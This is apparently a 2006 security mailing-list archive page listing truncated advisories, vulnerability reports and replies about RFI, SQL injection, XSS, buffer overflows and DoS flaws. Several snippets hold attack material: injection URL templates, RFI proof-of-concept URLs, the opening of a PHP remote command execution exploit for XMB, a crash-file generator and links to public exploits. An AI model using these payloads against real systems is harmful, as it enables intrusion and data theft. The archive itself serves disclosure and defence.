Re: phpPrintAnalyzer <= 1.1 (rep_par_rapport_racine) Remote File Inclusion Vulnerability

2006-08-14 Thread Carsten Eilers
[EMAIL PROTECTED] wrote on Mon, 7 Aug 2006 20:19:08 +: >-- > >Vulnerability: > >~ > >in index.php We Found Vulnerability Script > >--index.php-- > > > > >include($rep_par_rapp

[ MDKSA-2006:141 ] - Updated gnupg packages fix vulnerability

2006-08-14 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandriva Linux Security Advisory MDKSA-2006:141 http://www.mandriva.com/security/

[ MDKSA-2006:142 ] - Updated heartbeat packages fix vulnerability

2006-08-14 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandriva Linux Security Advisory MDKSA-2006:142 http://www.mandriva.com/security/

Re: Calendarix <= 0.7 (calpath) Remote File Inclusion Vulnerability

2006-08-14 Thread Steven M. Christey
Carsten Eilers said: > Take a look at the top of cal_config.inc.php: > > # adjust the '$calpath'. > # hardcode it if detection does not work and comment out the remaining > # code. > # > # $calpath = "C:\\PHP\\calendarix\\demo\\" ; > > $calpath = dirname(__FILE__) ; When doing post-disclosure

Security contact from Critical Path Inc

2006-08-14 Thread Guillermo Marro
Anyone knows how to reach them? thanks in advance, -Guillermo

Re: Re: myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

2006-08-14 Thread istgha
<<< We have same results in admin.php and db.php, Please don't post every include() function as a RFI vuln. Don't post such messages for being famous. >>> SecurityFocus shouldn't approve. Please read these lines again, again and again: <<< We have same results in admin.php and db.php, Plea

Re: RE: linksys WRT54g authentication bypass

2006-08-14 Thread gooorguss
I use WRT54g v4 (firmware v.4.20.8) and tried the following command. But I couldn't exploit my router. When I captured the normal packet with ethereal, I only saw "POST /apply.cgi ." When I captured the exploit packet with curl, I didn't receive a reply packet according to the exploit reques

Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability

2006-08-14 Thread Susan Bradley, CPA aka Ebitz - SBS Rocks [MVP]
There's still an unpatched DoS for the server service as blogged on the MSRC blog: Also - an additional point of clarification - it's important to distinguish that while MS06-040 addresses a vulnerability in the Server Servi

Opera 9 Remote Denial of Service

2006-08-14 Thread NNP
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 http://www.milw0rm.com/exploits/2179 Run the above as a server and connect to it using the in-built IRC client. The Linux, Windows and OSX versions are vulnerable and others may also be. By embedding a redirect to irc://evilhost in a web page the bro

Multiple Arbitrary File Access (Write/Read) Vulnerabilities

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Multiple Arbitrary File Access (Write/Read) Vulnerabilities Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisor

RE: linksys WRT54g authentication bypass

2006-08-14 Thread TeamXMM Consulting, Inc.
Use a different Firmware then... Preferably, Sveasoft or DD-WRT The Sveasoft firmware is a replacement firmware upgrade for ASUS, Belkin, Buffalotech, and Linksys wireless routers. :D Sincerely, TeamXMM Internet Security & Consulting, Inc. Email: [EMAIL PROTECTED] Web http://www.teamxmm

[ GLSA 200608-20 ] Ruby on Rails: Several vulnerabilities

2006-08-14 Thread Raphael Marichez
Gentoo Linux Security Advisory GLSA 200608-20 http://security.gentoo.org/

Joomla Webring Component (component_dir) Remote File Inclusion Vulnerabilities

2006-08-14 Thread x0r0n
### CYBER-WARRiOR TIM ### Joomla Webring Component (co

Multiple Buffer Overflow Vulnerabilities in Informix

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Multiple Buffer Overflow Vulnerabilities in Informix Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory numb

(somewhat) breaking the same-origin policy by undermining dns-pinning

2006-08-14 Thread Martin Johns
Hello list, A small contribution to the current "hacking the intranet with JavaScript" meme (also posted to my blog at http://shampoo.antville.org/stories/1451301/). == Introduction = J. Grossman, RSnake, SPI Dynamics, pdp and others have demonstrated lately that it is possible for a malicious

[Overflow.pl] ImageMagick ReadSGIImage() Heap Overflow

2006-08-14 Thread Damian Put
Overflow.pl Security Advisory #7 ImageMagick ReadSGIImage() Heap Overflow Vendor: ImageMagick (http://www.imagemagick.org) Affected version: 6.x up to and including 6.2.8 Vendor status: Fixed version released (6.2.9) Author: Damian Put <[EMAIL PROTECTED]> URL: http://www.overflow.pl/adv/imsgihea

Multiple buffer-overflows in libmusicbrainz 2.1.2

2006-08-14 Thread Luigi Auriemma
### Luigi Auriemma Application: libmusicbrainz http://musicbrainz.org/doc/libmusicbrainz Versions: <= 2.1.2 and <= SVN 8406 (current SVN) Platforms:Windows, *nix, *BSD, Mac and

Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities

2006-08-14 Thread matdhule
--- Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities --- Author : Matdhule Date: August, 14th 2006 Locatio

Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

2006-08-14 Thread noname
HE ... Security FOCUS Moderators please don't add ! cfgLanguage is defined in config.php : $cfgLanguage= 'uk'; how can you change $cfgLanguage when it is defined ? Another Fake BUG Like Mafia Moblog Vulnerability : MAFIA MoBlog BID : 19458 MAFIA : http://securityfocus.com/bid/19458

RE: ANNOUNCING: 3rd Annual US OWASP AppSec Conference - Oct 16-18 2006 - Seattle, WA

2006-08-14 Thread Dave Wichers
Many more details for the OWASP conference have been settled and are now available on the OWASP site, including: 1) Most of the agenda is set: See: http://www.owasp.org/index.php/OWASP_AppSec_Seattle_2006/Agenda 2) Conference hotel discounts have been negotiated and I'd strongly recommend making

osDate 1.1.8 - Multiple HTML Injection Vulnerability - fixed

2006-08-14 Thread vijay
Hi, The bug as reported in thread 19034 is fixed in the version osDate 1.1.8. Thanks Vijay

Re: Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability

2006-08-14 Thread mr
I can confirm for Windows XP, fully patched... Initially I tried this from http://www.security.nnov.ru/files/mswinmailslotex.c - same exploit, but from a different site. But I think it exploits the same, or a very similar, vulnerability to MS06-040.

Multiple Password Exposures Flaws

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Multiple Password Exposures Flaws Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory number: #NISR02082006E

Local privilege Escalation in SmartLine DeviceLock 5.73

2006-08-14 Thread seppi
The vulnerability consists of wrong ACLs on the Device Object permission set by the driver. Whenever your ACLs on a hard drive or partition, as configured by DeviceLock Manager, only consist of Allow entries (and Deny being the default), then the driver sets the ACLs on the kernel's internal ob

Unauthorized Database Creation Privilege on Informix

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Unauthorized Database Creation Privilege on Informix Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1 Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006

Technical note: under some conditions, it's possible to steal HTTP credentials using Flash

2006-08-14 Thread Amit Klein (AKsecurity)
Technical note: under some conditions, it's possible to steal HTTP credentials using Flash (requires IE + some transparent proxies or virtual hosting) The method described here is pretty simple. It works though only on HTTP (not HTTPS) credentials. Also, it works only when the client browses (u

Re: [SM-ANNOUNCE] SquirrelMail 1.4.8 released - fixes variable overwriting attack

2006-08-14 Thread Michael Engert
Hello, On Fri, 11 Aug 2006, Yves Goergen wrote: > I can't apply the patch, the patch command asks me for the files and > says it cannot find the header of a unified diff. Can anybody tell me > how to use this patch? Usually, it works but not this time. You just have to remove the first lines of t

InfanView 3.98 (with plugins) - Access violation at processing images CUR files

2006-08-14 Thread sehato
Example (in Delphi): ===cur.dpr=== program cur; {$APPTYPE CONSOLE} const FileName='file.cur'; Len=6; Buf=#$00#$00#$01#$00#$00#$00; var F:File; begin AssignFile(F,FileName); Rewrite(F,1); BlockWrite(F,Buf,Len); CloseFile(F); end. =

Multiple Arbitrary Command Execution Vulnerabilities

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Multiple Arbitrary Command Execution Vulnerabilities Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory numb

Arbitrary Library Loading in Informix

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Arbitrary Library Loading in Informix Systems Affected: All versions of Informix Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory number: #NISR020820

Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability

2006-08-14 Thread ss_team
Hi all, Software: WP-DB Backup Plugin for Wordpress Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ Description: WP-DB Backup is vulnerable to directory traversal attack. You must have administrator rights in the wordpress blog to exploit this vulnerability. PoC:

Kaspersky Anti-Hacker personal firewall unstealthy stealth mode

2006-08-14 Thread tbratusa
Kaspersky personal firewall 1.8.180 in "stealth mode" configuration doesn't detect or block timestamp and network block ICMP requests. They still call it a stealth mode feature, yeah sure ;) Try: nmap -sP -PE nmap -sP -PM

HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution

2006-08-14 Thread security-alert
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00742778 Version: 1 HPSBMA02138 SSRT061184 rev.1 - HP OpenView Storage Data Protector, Remote Arbitrary Command Execution NOTICE: The information in this Security Bulletin should be acted upon

Re: Startpage <= 1.0 (cfgLanguage) Remote File Inclusion Vulnerability

2006-08-14 Thread Carsten Eilers
[EMAIL PROTECTED] wrote on Thu, 10 Aug 2006 20:53:46 +: >Sanitize Variable $cfgLanguage in edit.php , functions.php , new.php , >PageBottom.php > >& PageTop.php Take a look at config.php: $cfgLanguage= 'uk'; // Which language do you prefer :

RE: Re: Cisco VPN Concentrator IKE resource exhaustion DoS Advisory

2006-08-14 Thread Lance Seelbach
In reviewing the "fine print" of the Cisco response, their recommendations fall in the category of a workaround, since the underlying "vulnerability" is really a flaw in the IKE protocol. Fix the protocol and you can fix the "vulnerability". But that would require that every vendor who uses IKE t

JavaScript get Internal Address (thanks to DanBUK)

2006-08-14 Thread pdp (architect)
http://www.gnucitizen.org/projects/javascript-address-info http://f-box.org/~dan/jstest.html The following technique was brought to me by DanBUK (http://f-box.org/~dan/). Dan managed to find the internal IP address of the visiting client by establishing a socket between local host and the remote

Re: [SM-ANNOUNCE] SquirrelMail 1.4.8 released - fixes variable overwriting attack

2006-08-14 Thread Allie Daneman
Go in the base dir of your SM install, patch -p0 < patch_file.patch On Friday 11 August 2006 06:23, Yves Goergen wrote: > On 11.08.2006 14:26 CE(S)T, Thijs Kinkhorst wrote: > > The patches can be found here: > > http://www.squirrelmail.org/patches/sqm1.4.7-expired-post-fix-minimal.pat > >ch > > ht

Virtual War v1.5.0 SQL injection and XSS

2006-08-14 Thread vampire_chiristof
Virtual War v1.5.0 SQL injection and XSS http://[host]/vwar/war.php?s=[SQL] http://[host]/vwar/war.php?page=[SQL]or[xss] http://[host]/vwar/war.php?showgame=[SQL] http://[host]/vwar/war.php?sortby=[sql] http://[host]/vwar/war.php?sortorder=[sql] http://[host]/vwar/calendar.php?year=[xss] ve

BlaBla 4U XSS Vulnerability

2006-08-14 Thread vampire_chiristof
BlaBla 4U XSS Vulnerability vendor : http://www.blabla4u.com http://www.Host.com/trial.php?product=[XSS] http://www.Host.com/[patch]/ForumsII.asp?ForumID=[XSS] Discovered by Vampire connect me :[EMAIL PROTECTED]

Re: Yabb XSS - or NOT

2006-08-14 Thread Volker Tanger
On 10 Aug 2006 04:13:34 - [EMAIL PROTECTED] wrote: > ### Software: YaBB > > #Attack method: Cross Site Scripting > #

XMB <= 1.9.6 Final basename()/'langfilenew' arbitrary local inclusion / remote commands execution

2006-08-14 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\n";; echo "dork: \"Powered by XMB\"\n\n"; /* works regardless of php.ini settings */ if ($argc<6) { echo "Usage: php ".$argv[0]." host path username password cmd OPTIONS\n"; echo "host: target server (ip/hostname)\

SQLIDEBUG envariable overflow on Informix

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: SQLIDEBUG envariable overflow on Informix Systems Affected: 9.40.xC6 and earlier and 10.00.xC2, C1 Severity: High Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006 Advisory n

Google Picasa Listening on Port 80?

2006-08-14 Thread Geoff Vass
I'm using Picasa 2.5 Beta (32.43), and I notice from Sysinternals' TCPVIEW app that it is listening on port 80. So I fire up the browser, and sure enough, http://localhost returns a blank page. When I close Picasa, the browser returns "The page cannot be displayed". What a great idea, a user-mode

Re: miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability

2006-08-14 Thread Carsten Eilers
[EMAIL PROTECTED] wrote on Thu, 10 Aug 2006 20:38:38 +: >PoC: > >~~~ > >http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script] Now you have your evil script included in a function. But how would you call the function, to execute your script? Regards Carsten -- Di

RE: [Full-disclosure] RE: when will AV vendors fix this???

2006-08-14 Thread Dmitry Yu. Bolkhovityanov
On Mon, 7 Aug 2006, Thomas D. wrote: > And even if you hide the file, if it is hidden the way you describe, you aren't > able to execute the file, until you give access to yourself. If you do this, > the anti-virus program will also have access > > > Keep in mind: If it is an unknown file (zero-d

[ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability

2006-08-14 Thread erdc
ECHO_ADV_45$2006 - [ECHO_ADV_45$2006] WEBinsta CMS 0.3.1 (templates_dir) Remote File Inclusion Vulnerability - Autho

Re: Mafia Moblog <= 6 (pathtotemplate) Remote File Inclusion Vulnerability

2006-08-14 Thread noname
(please remove this bid : 19458) Mafia Moblog isn't vulnerable. why ?! Exploit of Mafia is here : http://www.example.com/[Mafia Moblog]/big.php?pathtotemplate=[Evil Script] in big.php we have : but $pathtotemplate was defined already in template.php see this line: include("template.php");

Re: Calendarix <= 0.7 (calpath) Remote File Inclusion Vulnerability

2006-08-14 Thread Carsten Eilers
[EMAIL PROTECTED] wrote on Sat, 12 Aug 2006 09:59:20 +: > >Solution: > > > >Sanitize Variable $calpath in cal_config.inc.php > >- Take a look at the top of cal_config.inc.php: # adjust the '$calpath'. # hardcode it if detection does not work and

Re: myEvent <= 1.4 Multiple Remote File Include Vulnerabilities

2006-08-14 Thread Carsten Eilers
[EMAIL PROTECTED] wrote on Sat, 12 Aug 2006 10:03:15 +: >-admin.php-- > > > > >include_once($language); > >?> > >... Take a look at config.php: $language = "lang_eng.php"; and at admin.php: -event.php

Error logging buffer overflow in Informix

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Error logging buffer overflow in Informix Systems Affected: Informix 9.40.xC7 and xC8, 10.00.xC3 and xC4 Severity: Critical Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisory: 2nd August 2006

Informix Long Username Buffer Overflow Vulnerability

2006-08-14 Thread NGSSoftware Insight Security Research
NGSSoftware Insight Security Research Advisory Name: Informix Long Username Buffer Overflow Vulnerability Systems Affected: Informix 9.40.xC6 and earlier, 10.00.xC2 and earlier Severity: Critical Vendor URL: http://www.ibm.com/ Author: David Litchfield [ [EMAIL PROTECTED] ] Date of Public Advisor

Informix - Discovery, Attack and Defense

2006-08-14 Thread David Litchfield
Hey all, I've just posted "Informix - Discovery, Attack and Defense" to databasesecurity.com. For those that would like a copy you can download it from http://www.databasesecurity.com/informix-securing.htm. This paper is derived from Chapter 11 from the Database Hacker's Handbook. The issues discus

Re: TSRT-06-02: Microsoft SRV.SYS Mailslot Ring0 Memory Corruption Vulnerability

2006-08-14 Thread public
After furiously patching since last week to catch up with MS06-040, we discovered that an old exploit for MS06-035 (again or still) works on a number of fully patched systems including Windows 2003 Server, Windows XP and Windows 2000. The exploit that works is: http://milw0rm.org/exploits/2057